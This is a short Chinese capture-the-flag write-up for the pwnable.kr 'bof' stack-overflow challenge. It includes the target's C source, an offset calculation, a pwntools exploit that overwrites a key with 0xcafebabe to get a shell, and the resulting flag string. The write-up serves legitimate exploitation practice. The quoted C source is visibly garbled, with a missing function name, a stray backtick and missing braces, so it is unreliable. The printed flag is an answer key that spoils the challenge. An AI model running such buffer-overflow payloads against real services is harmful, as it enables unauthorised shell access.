nc pwnable.kr 9000
源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#include <string.h> #include <stdlib.h> void (int key) char `[32 ]; printf ("overflow me : " ); gets(overflowme); if (key == 0xcafebabe ){ system("/bin/sh" ); } else { printf ("Nah..n" ); } } int main (int argc, char * argv[]) func(0xdeadbeef ); return 0 ; }
1.overflowme是一个长度为32的数组
2.gets没有做输入的限制
3.当key == 0xcafebabe才可以调用命令
所以,这是个栈溢出的pwn,首先输入超出栈,溢出将key的值改变
盗用别人的IDAf5查看
s的地址为bp-2c,a1的地址为bp+8,那么相差就是0x2c+0x08=52
编写脚本
1 2 3 4 5 6 7 8 9
from pwn import *r = remote("pwnable.kr" ,"9000" ) key = 0xcafebabe payload = "A" * 52 + p32(key) r.send(payload) r.interactive()
flag
1 2 3 4 5 6 7 8 9 10 11 12 13
python wp.py [+] Opening connection to pwnable.kr on port 9000: Done [*] Switching to interactive mode $ ls $ ls bof bof.c flag log log2 super.pl $ cat flag daddy, I just pwned a buFFer :)
近期评论